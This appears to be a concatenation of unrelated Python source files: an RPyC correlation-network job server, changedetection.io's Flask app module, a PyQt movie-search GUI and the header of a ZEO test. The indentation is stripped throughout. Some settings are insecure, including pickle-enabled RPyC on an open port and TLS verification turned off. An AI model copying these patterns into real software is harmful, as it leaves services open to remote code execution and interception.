return (job.hash_id, job.status, job.status_reason, job.owner, j.owner_salt, job.dataset) if job is not None else (-1, 4, "", "", "")
@staticmethod
@pny.db_session
def job_queue(job_hash_id):
# Retrieve job ID by hash
jobID = pny.get(j.id for j in CorrelationNetworkJob if j.hash_id == job_hash_id)
# Look for uncompleted jobs
queue = pny.select(j for j in CorrelationNetworkJob if j.id < jobID and (j.status == 1 or j.status == 2))
# Return data
return [(j.hash_id, j.status, j.status_reason, j.owner, j.owner_salt, j.dataset) for j in queue] if queue is not None else [(-1, 4, "", "", "")]
@pny.db_session
def main():
class RPYCService(rpyc.Service):
@staticmethod
def exposed_job_status(job_hash_id):
return server_obj.job_status(job_hash_id)
@staticmethod
def exposed_submit_job(dataset, candidates="", columns="", verbose=False, threshold=0.9,
minimum_cluster_size=5, owner="", owner_salt=""):
return server_obj.submit_job(dataset, candidates, columns, verbose, threshold, minimum_cluster_size, owner, owner_salt)
@staticmethod
def exposed_job_queue(job_hash_id):
return server_obj.job_queue(job_hash_id)
try:
server = ThreadedServer(RPYCService, port=3030, protocol_config={"allow_public_attrs": True,
"allow_pickle": True})
except OSError:
# The port is in use. Exit gracefully.
print("CorrelationNetworkServer.py: The port is in use (the server is already running).")
return
t = Thread(target=server.start)
t.daemon = True
t.start()
server_lock = threading.Lock()
server_obj = RPYCServer(server_lock)
while True:
job_id = server_obj.queue.get()
print("Got job no. {0} from the queue. Loading job from DB.".format(job_id))
job = pny.get(j for j in CorrelationNetworkJob if j.id == job_id)
print("Starting job no. {0} with the hash {1} using dataset {2}.".format(job.id, job.hash_id, job.dataset))
job.status = JobStatus.Running
job.start_time = dt.datetime.today()
pny.commit()
try:
dataset = Datasets.all_by_name[job.dataset]
candidates = None
if job.candidates != "":
candidates = job.candidates.split(",")
columns = []
if job.columns == "":
columns.extend(dataset.columns)
columns_mapped = [dataset.name_column]
columns_mapped.extend(dataset.columns)
else:
columns.extend(job.columns.split(","))
# Reverse map columns by index
columns_mapped = [dataset.name_column]
for c in columns:
columns_mapped.append(dataset.columns[int(c)])
out_file = os.path.join(data_dir, "{0}.json.gz".format(job.hash_id))
import CorrelationNetwork
CorrelationNetwork.create_correlation_network(dataset, candidates, columns_mapped, job.verbose, out_file,
job.threshold, job.minimum_cluster_size, job.owner, job.owner_salt, job.hash_id)
job.status = JobStatus.Done
job.end_time = dt.datetime.today()
print("Job no. {0} (hash: {1}) done.".format(job.id, job.hash_id))
except Exception as e:
job.status = JobStatus.Error
job.status_reason = json.dumps(e.args)
print("Job no. {0} (hash: {1}) crashed: {1}".format(job.id, job.hash_id, e.args))
finally:
pny.commit()
if job.owner != None or job.owner != False or job.owner != '':
print('Sending mail to job owner at ' + str(job.owner))
mailer = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))), 'lib', 'corx', 'mail.php')
script_response = subprocess.check_output(["php", mailer, json.dumps({ 'owner': job.owner, 'hash_id': job.hash_id })])
print(str(script_response))
if __name__ == '__main__':
main()
|
__init__.py
|
#!/usr/bin/python3
# @todo logging
# @todo extra options for url like , verify=False etc.
# @todo enable https://urllib3.readthedocs.io/en/latest/user-guide.html#ssl as option?
# @todo option for interval day/6 hour/etc
# @todo on change detected, config for calling some API
# @todo fetch title into json
# https://distill.io/features
# proxy per check
# - flask_cors, itsdangerous,MarkupSafe
import time
import os
import timeago
import flask_login
from flask_login import login_required
import threading
from threading import Event
import queue
from flask import Flask, render_template, request, send_from_directory, abort, redirect, url_for, flash
from feedgen.feed import FeedGenerator
from flask import make_response
import datetime
import pytz
from copy import deepcopy
__version__ = '0.39.4'
datastore = None
# Local
running_update_threads = []
ticker_thread = None
extra_stylesheets = []
update_q = queue.Queue()
notification_q = queue.Queue()
# Needs to be set this way because we also build and publish via pip
base_path = os.path.dirname(os.path.realpath(__file__))
app = Flask(__name__,
static_url_path="{}/static".format(base_path),
template_folder="{}/templates".format(base_path))
# Stop browser caching of assets
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.config.exit = Event()
app.config['NEW_VERSION_AVAILABLE'] = False
app.config['LOGIN_DISABLED'] = False
#app.config["EXPLAIN_TEMPLATE_LOADING"] = True
# Disables caching of the templates
app.config['TEMPLATES_AUTO_RELOAD'] = True
def init_app_secret(datastore_path):
secret = ""
path = "{}/secret.txt".format(datastore_path)
try:
with open(path, "r") as f:
secret = f.read()
except FileNotFoundError:
import secrets
with open(path, "w") as f:
secret = secrets.token_hex(32)
f.write(secret)
return secret
# Remember python is by reference
# populate_form in wtfors didnt work for me. (try using a setattr() obj type on datastore.watch?)
def populate_form_from_watch(form, watch):
for i in form.__dict__.keys():
if i[0] != '_':
p = getattr(form, i)
if hasattr(p, 'data') and i in watch:
setattr(p, "data", watch[i])
# We use the whole watch object from the store/JSON so we can see if there's some related status in terms of a thread
# running or something similar.
@app.template_filter('format_last_checked_time')
def _jinja2_filter_datetime(watch_obj, format="%Y-%m-%d %H:%M:%S"):
# Worker thread tells us which UUID it is currently processing.
for t in running_update_threads:
if t.current_uuid == watch_obj['uuid']:
return "Checking now.."
if watch_obj['last_checked'] == 0:
return 'Not yet'
return timeago.format(int(watch_obj['last_checked']), time.time())
# @app.context_processor
# def timeago():
# def _timeago(lower_time, now):
# return timeago.format(lower_time, now)
# return dict(timeago=_timeago)
@app.template_filter('format_timestamp_timeago')
def _jinja2_filter_datetimestamp(timestamp, format="%Y-%m-%d %H:%M:%S"):
return timeago.format(timestamp, time.time())
# return timeago.format(timestamp, time.time())
# return datetime.datetime.utcfromtimestamp(timestamp).strftime(format)
class User(flask_login.UserMixin):
id=None
def set_password(self, password):
return True
def get_user(self, email="defaultuser@changedetection.io"):
return self
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return str(self.id)
def check_password(self, password):
import hashlib
import base64
# Getting the values back out
raw_salt_pass = base64.b64decode(datastore.data['settings']['application']['password'])
salt_from_storage = raw_salt_pass[:32] # 32 is the length of the salt
# Use the exact same setup you used to generate the key, but this time put in the password to check
new_key = hashlib.pbkdf2_hmac(
'sha256',
password.encode('utf-8'), # Convert the password to bytes
salt_from_storage,
100000
)
new_key = salt_from_storage + new_key
return new_key == raw_salt_pass
pass
def changedetection_app(config=None, datastore_o=None):
global datastore
datastore = datastore_o
#app.config.update(config or {})
login_manager = flask_login.LoginManager(app)
login_manager.login_view = 'login'
app.secret_key = init_app_secret(config['datastore_path'])
# Setup cors headers to allow all domains
# https://flask-cors.readthedocs.io/en/latest/
# CORS(app)
@login_manager.user_loader
def user_loader(email):
user = User()
user.get_user(email)
return user
@login_manager.unauthorized_handler
def unauthorized_handler():
# @todo validate its a URL of this host and use that
return redirect(url_for('login', next=url_for('index')))
@app.route('/logout')
def logout():
flask_login.logout_user()
return redirect(url_for('index'))
# https://github.com/pallets/flask/blob/93dd1709d05a1cf0e886df6223377bdab3b077fb/examples/tutorial/flaskr/__init__.py#L39
# You can divide up the stuff like this
@app.route('/login', methods=['GET', 'POST'])
def login():
if not datastore.data['settings']['application']['password']:
flash("Login not required, no password enabled.", "notice")
return redirect(url_for('index'))
if request.method == 'GET':
output = render_template("login.html")
return output
user = User()
user.id = "defaultuser@changedetection.io"
password = request.form.get('password')
if (user.check_password(password)):
flask_login.login_user(user, remember=True)
next = request.args.get('next')
# if not is_safe_url(next):
# return flask.abort(400)
return redirect(next or url_for('index'))
else:
flash('Incorrect password', 'error')
return redirect(url_for('login'))
@app.before_request
def do_something_whenever_a_request_comes_in():
# Disable password loginif there is not one set
app.config['LOGIN_DISABLED'] = datastore.data['settings']['application']['password'] == False
# For the RSS path, allow access via a token
if request.path == '/rss' and request.args.get('token'):
app_rss_token = datastore.data['settings']['application']['rss_access_token']
rss_url_token = request.args.get('token')
if app_rss_token == rss_url_token:
app.config['LOGIN_DISABLED'] = True
@app.route("/rss", methods=['GET'])
@login_required
def rss():
limit_tag = request.args.get('tag')
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
# @todo needs a .itemsWithTag() or something
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
fg = FeedGenerator()
fg.title('changedetection.io')
fg.description('Feed description')
fg.link(href='https://changedetection.io')
for watch in sorted_watches:
if not watch['viewed']:
# Re #239 - GUID needs to be individual for each event
# @todo In the future make this a configurable link back (see work on BASE_URL https://github.com/dgtlmoon/changedetection.io/pull/228)
guid = "{}/{}".format(watch['uuid'], watch['last_changed'])
fe = fg.add_entry()
fe.title(watch['url'])
fe.link(href=watch['url'])
fe.description(watch['url'])
fe.guid(guid, permalink=False)
dt = datetime.datetime.fromtimestamp(int(watch['newest_history_key']))
dt = dt.replace(tzinfo=pytz.UTC)
fe.pubDate(dt)
response = make_response(fg.rss_str())
response.headers.set('Content-Type', 'application/rss+xml')
return response
@app.route("/", methods=['GET'])
@login_required
def index():
limit_tag = request.args.get('tag')
pause_uuid = request.args.get('pause')
# Redirect for the old rss path which used the /?rss=true
if request.args.get('rss'):
return redirect(url_for('rss', tag=limit_tag))
if pause_uuid:
try:
datastore.data['watching'][pause_uuid]['paused'] ^= True
datastore.needs_write = True
return redirect(url_for('index', tag = limit_tag))
except KeyError:
pass
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
existing_tags = datastore.get_all_tags()
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
output = render_template("watch-overview.html",
form=form,
watches=sorted_watches,
tags=existing_tags,
active_tag=limit_tag,
app_rss_token=datastore.data['settings']['application']['rss_access_token'],
has_unviewed=datastore.data['has_unviewed'])
return output
@app.route("/scrub", methods=['GET', 'POST'])
@login_required
def scrub_page():
import re
if request.method == 'POST':
confirmtext = request.form.get('confirmtext')
limit_date = request.form.get('limit_date')
limit_timestamp = 0
# Re #149 - allow empty/0 timestamp limit
if len(limit_date):
try:
limit_date = limit_date.replace('T', ' ')
# I noticed chrome will show '/' but actually submit '-'
limit_date = limit_date.replace('-', '/')
# In the case that :ss seconds are supplied
limit_date = re.sub(r'(\d\d:\d\d)(:\d\d)', '\\1', limit_date)
str_to_dt = datetime.datetime.strptime(limit_date, '%Y/%m/%d %H:%M')
limit_timestamp = int(str_to_dt.timestamp())
if limit_timestamp > time.time():
flash("Timestamp is in the future, cannot continue.", 'error')
return redirect(url_for('scrub_page'))
except ValueError:
flash('Incorrect date format, cannot continue.', 'error')
return redirect(url_for('scrub_page'))
if confirmtext == 'scrub':
changes_removed = 0
for uuid, watch in datastore.data['watching'].items():
if limit_timestamp:
changes_removed += datastore.scrub_watch(uuid, limit_timestamp=limit_timestamp)
else:
changes_removed += datastore.scrub_watch(uuid)
flash("Cleared snapshot history ({} snapshots removed)".format(changes_removed))
else:
flash('Incorrect confirmation text.', 'error')
return redirect(url_for('index'))
output = render_template("scrub.html")
return output
# If they edited an existing watch, we need to know to reset the current/previous md5 to include
# the excluded text.
def get_current_checksum_include_ignore_text(uuid):
import hashlib
from changedetectionio import fetch_site_status
# Get the most recent one
newest_history_key = datastore.get_val(uuid, 'newest_history_key')
# 0 means that theres only one, so that there should be no 'unviewed' history availabe
if newest_history_key == 0:
newest_history_key = list(datastore.data['watching'][uuid]['history'].keys())[0]
if newest_history_key:
with open(datastore.data['watching'][uuid]['history'][newest_history_key],
encoding='utf-8') as file:
raw_content = file.read()
handler = fetch_site_status.perform_site_check(datastore=datastore)
stripped_content = handler.strip_ignore_text(raw_content,
datastore.data['watching'][uuid]['ignore_text'])
checksum = hashlib.md5(stripped_content).hexdigest()
return checksum
return datastore.data['watching'][uuid]['previous_md5']
@app.route("/edit/<string:uuid>", methods=['GET', 'POST'])
@login_required
def edit_page(uuid):
from changedetectionio import forms
form = forms.watchForm(request.form)
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
if request.method == 'GET':
if not uuid in datastore.data['watching']:
flash("No watch with the UUID %s found." % (uuid), "error")
return redirect(url_for('index'))
populate_form_from_watch(form, datastore.data['watching'][uuid])
if datastore.data['watching'][uuid]['fetch_backend'] is None:
form.fetch_backend.data = datastore.data['settings']['application']['fetch_backend']
if request.method == 'POST' and form.validate():
# Re #110, if they submit the same as the default value, set it to None, so we continue to follow the default
if form.minutes_between_check.data == datastore.data['settings']['requests']['minutes_between_check']:
form.minutes_between_check.data = None
if form.fetch_backend.data == datastore.data['settings']['application']['fetch_backend']:
form.fetch_backend.data = None
update_obj = {'url': form.url.data.strip(),
'minutes_between_check': form.minutes_between_check.data,
'tag': form.tag.data.strip(),
'title': form.title.data.strip(),
'headers': form.headers.data,
'fetch_backend': form.fetch_backend.data,
'trigger_text': form.trigger_text.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
'extract_title_as_title': form.extract_title_as_title.data
}
# Notification URLs
datastore.data['watching'][uuid]['notification_urls'] = form.notification_urls.data
# Ignore text
form_ignore_text = form.ignore_text.data
datastore.data['watching'][uuid]['ignore_text'] = form_ignore_text
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form_ignore_text:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid]['css_filter'] = form.css_filter.data.strip()
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form.css_filter.data.strip() != datastore.data['watching'][uuid]['css_filter']:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid].update(update_obj)
flash("Updated watch.")
# Re #286 - We wait for syncing new data to disk in another thread every 60 seconds
# But in the case something is added we should save straight away
datastore.sync_to_json()
# Queue the watch for immediate recheck
update_q.put(uuid)
if form.trigger_check.data:
if len(form.notification_urls.data):
n_object = {'watch_url': form.url.data.strip(),
'notification_urls': form.notification_urls.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
}
notification_q.put(n_object)
flash('Test notification queued.')
else:
flash('No notification URLs set, cannot send test.', 'error')
# Diff page [edit] link should go back to diff page
if request.args.get("next") and request.args.get("next") == 'diff':
return redirect(url_for('diff_history_page', uuid=uuid))
else:
return redirect(url_for('index'))
else:
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
# Re #110 offer the default minutes
using_default_minutes = False
if form.minutes_between_check.data == None:
form.minutes_between_check.data = datastore.data['settings']['requests']['minutes_between_check']
using_default_minutes = True
output = render_template("edit.html",
uuid=uuid,
watch=datastore.data['watching'][uuid],
form=form,
using_default_minutes=using_default_minutes,
current_base_url = datastore.data['settings']['application']['base_url']
)
return output
@app.route("/settings", methods=['GET', "POST"])
@login_required
def settings_page():
from changedetectionio import forms
from changedetectionio import content_fetcher
form = forms.globalSettingsForm(request.form)
if request.method == 'GET':
form.minutes_between_check.data = int(datastore.data['settings']['requests']['minutes_between_check'])
form.notification_urls.data = datastore.data['settings']['application']['notification_urls']
form.extract_title_as_title.data = datastore.data['settings']['application']['extract_title_as_title']
form.fetch_backend.data = datastore.data['settings']['application']['fetch_backend']
form.notification_title.data = datastore.data['settings']['application']['notification_title']
form.notification_body.data = datastore.data['settings']['application']['notification_body']
form.notification_format.data = datastore.data['settings']['application']['notification_format']
form.base_url.data = datastore.data['settings']['application']['base_url']
# Password unset is a GET
if request.values.get('removepassword') == 'yes':
from pathlib import Path
datastore.data['settings']['application']['password'] = False
flash("Password protection removed.", 'notice')
flask_login.logout_user()
return redirect(url_for('settings_page'))
if request.method == 'POST' and form.validate():
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['requests']['minutes_between_check'] = form.minutes_between_check.data
datastore.data['settings']['application']['extract_title_as_title'] = form.extract_title_as_title.data
datastore.data['settings']['application']['fetch_backend'] = form.fetch_backend.data
datastore.data['settings']['application']['notification_title'] = form.notification_title.data
datastore.data['settings']['application']['notification_body'] = form.notification_body.data
datastore.data['settings']['application']['notification_format'] = form.notification_format.data
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['application']['base_url'] = form.base_url.data
if form.trigger_check.data:
if len(form.notification_urls.data):
n_object = {'watch_url': "Test from changedetection.io!",
'notification_urls': form.notification_urls.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
}
notification_q.put(n_object)
flash('Test notification queued.')
else:
flash('No notification URLs set, cannot send test.', 'error')
if form.password.encrypted_password:
datastore.data['settings']['application']['password'] = form.password.encrypted_password
flash("Password protection enabled.", 'notice')
flask_login.logout_user()
return redirect(url_for('index'))
datastore.needs_write = True
flash("Settings updated.")
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
output = render_template("settings.html", form=form, current_base_url = datastore.data['settings']['application']['base_url'])
return output
@app.route("/import", methods=['GET', "POST"])
@login_required
def import_page():
import validators
remaining_urls = []
good = 0
if request.method == 'POST':
urls = request.values.get('urls').split("\n")
for url in urls:
url = url.strip()
if len(url) and validators.url(url):
new_uuid = datastore.add_watch(url=url.strip(), tag="")
# Straight into the queue.
update_q.put(new_uuid)
good += 1
else:
if len(url):
remaining_urls.append(url)
flash("{} Imported, {} Skipped.".format(good, len(remaining_urls)))
if len(remaining_urls) == 0:
# Looking good, redirect to index.
return redirect(url_for('index'))
# Could be some remaining, or we could be on GET
output = render_template("import.html",
remaining="\n".join(remaining_urls)
)
return output
# Clear all statuses, so we do not see the 'unviewed' class
@app.route("/api/mark-all-viewed", methods=['GET'])
@login_required
def mark_all_viewed():
# Save the current newest history as the most recently viewed
for watch_uuid, watch in datastore.data['watching'].items():
datastore.set_last_viewed(watch_uuid, watch['newest_history_key'])
flash("Cleared all statuses.")
return redirect(url_for('index'))
@app.route("/diff/<string:uuid>", methods=['GET'])
@login_required
def diff_history_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
dates = list(watch['history'].keys())
# Convert to int, sort and back to str again
# @todo replace datastore getter that does this automatically
dates = [int(i) for i in dates]
dates.sort(reverse=True)
dates = [str(i) for i in dates]
if len(dates) < 2:
flash("Not enough saved change detection snapshots to produce a report.", "error")
return redirect(url_for('index'))
# Save the current newest history as the most recently viewed
datastore.set_last_viewed(uuid, dates[0])
newest_file = watch['history'][dates[0]]
with open(newest_file, 'r') as f:
newest_version_file_contents = f.read()
previous_version = request.args.get('previous_version')
try:
previous_file = watch['history'][previous_version]
except KeyError:
# Not present, use a default value, the second one in the sorted list.
previous_file = watch['history'][dates[1]]
with open(previous_file, 'r') as f:
previous_version_file_contents = f.read()
output = render_template("diff.html", watch_a=watch,
newest=newest_version_file_contents,
previous=previous_version_file_contents,
extra_stylesheets=extra_stylesheets,
versions=dates[1:],
uuid=uuid,
newest_version_timestamp=dates[0],
current_previous_version=str(previous_version),
current_diff_url=watch['url'],
extra_title=" - Diff - {}".format(watch['title'] if watch['title'] else watch['url']),
left_sticky= True )
return output
@app.route("/preview/<string:uuid>", methods=['GET'])
@login_required
def preview_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
newest = list(watch['history'].keys())[-1]
with open(watch['history'][newest], 'r') as f:
content = f.readlines()
output = render_template("preview.html",
content=content,
extra_stylesheets=extra_stylesheets,
current_diff_url=watch['url'],
uuid=uuid)
return output
@app.route("/favicon.ico", methods=['GET'])
def favicon():
return send_from_directory("static/images", path="favicon.ico")
# We're good but backups are even better!
@app.route("/backup", methods=['GET'])
@login_required
def get_backup():
import zipfile
from pathlib import Path
# Remove any existing backup file, for now we just keep one file
for previous_backup_filename in Path(app.config['datastore_path']).rglob('changedetection-backup-*.zip'):
os.unlink(previous_backup_filename)
# create a ZipFile object
backupname = "changedetection-backup-{}.zip".format(int(time.time()))
# We only care about UUIDS from the current index file
uuids = list(datastore.data['watching'].keys())
backup_filepath = os.path.join(app.config['datastore_path'], backupname)
with zipfile.ZipFile(backup_filepath, "w",
compression=zipfile.ZIP_DEFLATED,
compresslevel=8) as zipObj:
# Be sure we're written fresh
datastore.sync_to_json()
# Add the index
zipObj.write(os.path.join(app.config['datastore_path'], "url-watches.json"), arcname="url-watches.json")
# Add the flask app secret
zipObj.write(os.path.join(app.config['datastore_path'], "secret.txt"), arcname="secret.txt")
# Add any snapshot data we find, use the full path to access the file, but make the file 'relative' in the Zip.
for txt_file_path in Path(app.config['datastore_path']).rglob('*.txt'):
parent_p = txt_file_path.parent
if parent_p.name in uuids:
zipObj.write(txt_file_path,
arcname=str(txt_file_path).replace(app.config['datastore_path'], ''),
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
# Create a list file with just the URLs, so it's easier to port somewhere else in the future
list_file = os.path.join(app.config['datastore_path'], "url-list.txt")
with open(list_file, "w") as f:
for uuid in datastore.data['watching']:
url = datastore.data['watching'][uuid]['url']
f.write("{}\r\n".format(url))
# Add it to the Zip
zipObj.write(list_file,
arcname="url-list.txt",
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
return send_from_directory(app.config['datastore_path'], backupname, as_attachment=True)
@app.route("/static/<string:group>/<string:filename>", methods=['GET'])
def static_content(group, filename):
# These files should be in our subdirectory
try:
return send_from_directory("static/{}".format(group), path=filename)
except FileNotFoundError:
abort(404)
@app.route("/api/add", methods=['POST'])
@login_required
def api_watch_add():
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
if form.validate():
url = request.form.get('url').strip()
if datastore.url_exists(url):
flash('The URL {} already exists'.format(url), "error")
return redirect(url_for('index'))
# @todo add_watch should throw a custom Exception for validation etc
new_uuid = datastore.add_watch(url=url, tag=request.form.get('tag').strip())
# Straight into the queue.
update_q.put(new_uuid)
flash("Watch added.")
return redirect(url_for('index'))
else:
flash("Error")
return redirect(url_for('index'))
@app.route("/api/delete", methods=['GET'])
@login_required
def api_delete():
uuid = request.args.get('uuid')
datastore.delete(uuid)
flash('Deleted.')
return redirect(url_for('index'))
@app.route("/api/clone", methods=['GET'])
@login_required
def api_clone():
uuid = request.args.get('uuid')
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
new_uuid = datastore.clone(uuid)
update_q.put(new_uuid)
flash('Cloned.')
return redirect(url_for('index'))
@app.route("/api/checknow", methods=['GET'])
@login_required
def api_watch_checknow():
tag = request.args.get('tag')
uuid = request.args.get('uuid')
i = 0
running_uuids = []
for t in running_update_threads:
running_uuids.append(t.current_uuid)
# @todo check thread is running and skip
if uuid:
if uuid not in running_uuids:
update_q.put(uuid)
i = 1
elif tag != None:
# Items that have this current tag
for watch_uuid, watch in datastore.data['watching'].items():
if (tag != None and tag in watch['tag']):
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
else:
# No tag, no uuid, add everything.
for watch_uuid, watch in datastore.data['watching'].items():
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
flash("{} watches are rechecking.".format(i))
return redirect(url_for('index', tag=tag))
# @todo handle ctrl break
ticker_thread = threading.Thread(target=ticker_thread_check_time_launch_checks).start()
threading.Thread(target=notification_runner).start()
# Check for new release version, but not when running in test/build
if not os.getenv("GITHUB_REF", False):
threading.Thread(target=check_for_new_version).start()
return app
# Check for new version and anonymous stats
def check_for_new_version():
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
while not app.config.exit.is_set():
try:
r = requests.post("https://changedetection.io/check-ver.php",
data={'version': __version__,
'app_guid': datastore.data['app_guid'],
'watch_count': len(datastore.data['watching'])
},
verify=False)
except:
pass
try:
if "new_version" in r.text:
app.config['NEW_VERSION_AVAILABLE'] = True
except:
pass
# Check daily
app.config.exit.wait(86400)
def notification_runner():
while not app.config.exit.is_set():
try:
# At the moment only one thread runs (single runner)
n_object = notification_q.get(block=False)
except queue.Empty:
time.sleep(1)
else:
# Process notifications
try:
from changedetectionio import notification
notification.process_notification(n_object, datastore)
except Exception as e:
print("Watch URL: {} Error {}".format(n_object['watch_url'], e))
# Thread runner to check every minute, look for new watches to feed into the Queue.
def ticker_thread_check_time_launch_checks():
from changedetectionio import update_worker
# Spin up Workers.
for _ in range(datastore.data['settings']['requests']['workers']):
new_worker = update_worker.update_worker(update_q, notification_q, app, datastore)
running_update_threads.append(new_worker)
new_worker.start()
while not app.config.exit.is_set():
# Get a list of watches by UUID that are currently fetching data
running_uuids = []
for t in running_update_threads:
if t.current_uuid:
running_uuids.append(t.current_uuid)
# Re #232 - Deepcopy the data incase it changes while we're iterating through it all
copied_datastore = deepcopy(datastore)
# Check for watches outside of the time threshold to put in the thread queue.
for uuid, watch in copied_datastore.data['watching'].items():
# If they supplied an individual entry minutes to threshold.
if 'minutes_between_check' in watch and watch['minutes_between_check'] is not None:
# Cast to int just incase
max_time = int(watch['minutes_between_check']) * 60
else:
# Default system wide.
max_time = int(copied_datastore.data['settings']['requests']['minutes_between_check']) * 60
threshold = time.time() - max_time
# Yeah, put it in the queue, it's more than time.
if not watch['paused'] and watch['last_checked'] <= threshold:
if not uuid in running_uuids and uuid not in update_q.queue:
update_q.put(uuid)
# Wait a few seconds before checking the list again
time.sleep(3)
# Should be low so we can break this out in testing
app.config.exit.wait(1)
|
index.py
|
import time
from ui.main_ui import Ui_MainWindow
import sys
from PyQt5.QtWidgets import QApplication, QMainWindow, QHeaderView, QTableWidgetItem, QWidget
from core.moviedl import moviedl
from PyQt5.QtCore import QObject, pyqtSignal
from threading import Thread
from ui.about import Ui_Dialog
# 修改ui文件后重新复发布py文件 : pyuic5 -o ./ui/main_ui.py ./ui/main_ui.ui
# 打包exe : pyinstaller -w -F -i icon.ico index.py
# 使用自定义信号去控制页面元素的修改
class MySignal(QObject):
btnChange = pyqtSignal(str) # 自定义信号
statusBarChange = pyqtSignal(str)
# 每一个窗口都是一个类文件
# 版本信息窗口
class DialogW(Ui_Dialog, QWidget):
def __init__(self):
super(DialogW, self).__init__()
self.setupUi(self)
# 主程序
class Main(Ui_MainWindow, QMainWindow):
def __init__(self):
super(Main, self).__init__()
self.setupUi(self)
self.ms = MySignal() # 实例化自定义信号
self.logic()
# 业务逻辑
def logic(self):
self.searchBtn.clicked.connect(self.search) # 监听点击事件
self.actionversion.triggered.connect(self.show_about)
self.ms.btnChange.connect(self.btn_text_change) # 监听自定义信号
self.ms.statusBarChange.connect(self.status_bar_text_change)
# 显示版本信息页面
def show_about(self):
# 控制显示, 必须是全局变量才能监听, 否则会闪退
dialog.show()
# QMessageBox.information(self, '关于', content, QMessageBox.Ok)
# 修改按钮文字
def btn_text_change(self, text):
self.searchBtn.setText(text)
# 修改状态文字
def status_bar_text_change(self, text):
self.statusbar.showMessage(text)
# 开始搜索
def search(self):
# 不在主线程中执行这个
keyword = self.movieName.text() # 获取关键字
self.ms.btnChange.emit('搜索中') # 发送自定义信号
self.ms.statusBarChange.emit(f"【{keyword}】 正在搜索中....")
# 使用多线程来防止阻塞,影响页面渲染
def t_run(key):
md = moviedl()
start = time.time()
data = md.run(key)
end = time.time()
total_time = '%.2f' % (end - start)
self.show_result(data)
self.ms.statusBarChange.emit(f"【{key}】 搜索完成, 共找到 {len(data)} 条数据, 总耗时 {total_time}s")
self.ms.btnChange.emit('开始搜索') # 发送自定义信号
task = Thread(target=t_run, args=(keyword,)) # 线程只有一个参数的时候也必须用元组的方式传递参数
task.start()
# 结果展示
def show_result(self, data):
self.searchRes.horizontalHeader().setSectionResizeMode(2, QHeaderView.Interactive)
self.searchRes.setRowCount(len(data))
row = 0
for i in data:
self.searchRes.setItem(row, 0, QTableWidgetItem(i['source']))
self.searchRes.setItem(row, 1, QTableWidgetItem(i['movie_name']))
self.searchRes.setItem(row, 2, QTableWidgetItem(i['movie_link']))
row += 1
if __name__ == '__main__':
app = QApplication(sys.argv)
ui = Main() # 主窗口实例化
ui.show() # 主窗口展示
dialog = DialogW() # 子窗口只能全局实例化
sys.exit(app.exec_())
|
testZEO.py
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Test suite for ZEO based on ZODB.tests."""
from __future__ import print_function
import multiprocessing
import re
from ZEO.ClientStorage import ClientStorage
